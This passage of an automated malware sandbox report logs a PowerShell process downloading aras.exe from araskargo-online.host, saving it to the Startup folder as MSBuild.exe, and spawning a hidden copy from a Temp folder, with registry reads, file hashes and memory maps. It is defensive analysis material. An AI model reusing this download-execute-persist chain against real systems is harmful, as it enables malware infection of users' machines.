| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (33)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
10 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (61)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
55 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = araskargo-online.host, address_out = 31.220.2.200 |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 94 bytes |
| Total Data Received | 1.30 MB |
| Contacted Host Count | 1 |
| Contacted Hosts | araskargo-online.host |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | araskargo-online.host |
| Server Port | 80 |
| Data Sent | 94 |
| Data Received | 1361685 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = araskargo-online.host, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /familypictures/aras.exe |
|
1 | |
| Send HTTP Request | headers = host: araskargo-online.host, connection: Keep-Alive, url = araskargo-online.host/familypictures/aras.exe |
|
1 | |
| Read Response | size = 4096, size_out = 277 |
|
1 | |
| Read Response | size = 65536, size_out = 30660 |
|
1 | |
| Read Response | size = 65536, size_out = 16060 |
|
1 | |
| Read Response | size = 65536, size_out = 2920 |
|
1 | |
| Read Response | size = 65536, size_out = 14600 |
|
1 | |
| Read Response | size = 65536, size_out = 5840 |
|
2 | |
| Read Response | size = 65536, size_out = 20440 |
|
1 | |
| Read Response | size = 65536, size_out = 26280 |
|
1 | |
| Read Response | size = 65536, size_out = 35040 |
|
1 | |
| Read Response | size = 65536, size_out = 5840 |
|
1 | |
| Read Response | size = 65536, size_out = 37960 |
|
1 | |
| Read Response | size = 65536, size_out = 8760 |
|
1 | |
| Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Read Response | size = 65536, size_out = 628 |
|
1 | |
| Read Response | size = 65536, size_out = 13140 |
|
1 | |
| Read Response | size = 65536, size_out = 8760 |
|
1 | |
| Read Response | size = 65536, size_out = 1460 |
|
1 | |
| Read Response | size = 65536, size_out = 4380 |
|
1 | |
| Read Response | size = 65536, size_out = 20440 |
|
1 | |
| Read Response | size = 65536, size_out = 14600 |
|
1 | |
| Read Response | size = 65536, size_out = 13140 |
|
1 | |
| Read Response | size = 65536, size_out = 1460 |
|
1 | |
| Read Response | size = 65536, size_out = 2920 |
|
1 | |
| Read Response | size = 65536, size_out = 5840 |
|
1 | |
| Read Response | size = 65536, size_out = 29200 |
|
1 | |
| Read Response | size = 65536, size_out = 18980 |
|
1 | |
| Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Read Response | size = 65536, size_out = 2088 |
|
1 | |
| Read Response | size = 65536, size_out = 24820 |
|
1 | |
| Read Response | size = 65536, size_out = 43800 |
|
1 | |
| Read Response | size = 65536, size_out = 64024 |
|
1 | |
| Read Response | size = 65536, size_out = 24820 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 24984 |
|
1 | |
| Read Response | size = 65536, size_out = 5840 |
|
1 | |
| Read Response | size = 65536, size_out = 17520 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 3084 |
|
1 | |
| Read Response | size = 65536, size_out = 30660 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8924 |
|
1 | |
| Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Read Response | size = 65536, size_out = 2088 |
|
1 | |
| Read Response | size = 65536, size_out = 21900 |
|
1 | |
| Read Response | size = 65536, size_out = 5840 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 19144 |
|
1 | |
| Read Response | size = 65536, size_out = 11680 |
|
1 | |
| Read Response | size = 65536, size_out = 14600 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 33744 |
|
1 | |
| Read Response | size = 65536, size_out = 20440 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 1624 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 13304 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 164 |
|
1 | |
| Read Response | size = 65536, size_out = 21900 |
|
1 | |
| Read Response | size = 63684, size_out = 62148 |
|
1 | |
| Read Response | size = 1536, size_out = 1536 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: msbuild.exe
7
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\start menu\programs\startup\msbuild.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:02:12, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Self Terminated |
| Monitor Duration | 00:00:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbdc |
| Parent PID | 0xa20 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE0
0x
C0C
0x
C10
0x
C18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x000f0000 | 0x0014bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x00100000 | 0x00100fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00111fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x00140000 | 0x00140fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x00160000 | 0x00163fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00160000 | 0x00163fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001d.db | 0x00270000 | 0x00290fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x00497fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x005a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x006b0000 | 0x006b3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x006d0000 | 0x0099efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009a0000 | 0x009a0000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x009a0000 | 0x009cffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x009d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x00b2efff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x00b30000 | 0x00b95fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| msbuild.exe | 0x00f10000 | 0x0105efff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001060000 | 0x01060000 | 0x01c5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x02052fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0215ffff | Private Memory | rw |
|
|
|
- |
| msvcr90.dll | 0x5e930000 | 0x5e9d2fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp90.dll | 0x66330000 | 0x663bdfff | Memory Mapped File | rwx |
|
|
|
- |
| wpdshext.dll | 0x66970000 | 0x66ba7fff | Memory Mapped File | rwx |
|
|
|
- |
| ieframe.dll | 0x6d8e0000 | 0x6e35ffff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x6f370000 | 0x6f3a1fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x70880000 | 0x708adfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x72130000 | 0x7217bfff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x72fc0000 | 0x72ffbfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x74660000 | 0x747effff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77660000 | 0x77754fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77980000 | 0x77984fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe | 660.50 KB |
MD5:
db5e092d6ba44b4cd6d56525d26f77d5
SHA1: d099ffb84b70d417ab56e77938f006b66854f065 SHA256: aac6f556cdf12a9bdbd8c434185efb53dced35ba12139d2b04e605f90e35689a SSDeep: 12288:H+OtcQvFRh50ViU8L1PW7ps7nvNlCzXZmoMSPlJuxRY1Ugz1/ZjRFwRJoEfIm:eODvzh5kiU8tjvvU/axmdRdRFwjocIm |
|
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe | file_attributes = _O_WRONLY | _O_BINARY |
|
1 | |
| Create Directory | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall | - |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe | size = 676352 |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe | show_window = SW_HIDE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 10000 milliseconds (10.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-10-09 05:31:38 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 191647 |
|
1 |
Process #4: msbuild.exe
0
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\temp\msinstall\msbuild.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\MSInstall\MSBuild.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:27, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc1c |
| Parent PID | 0xbdc (c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\start menu\programs\startup\msbuild.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00427fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | rwx |
|
|
|
- |
| msbuild.exe | 0x00fc0000 | 0x0106dfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x654c0000 | 0x65539fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x66bc0000 | 0x66c09fff | Memory Mapped File | rwx |
|
|
|
- |
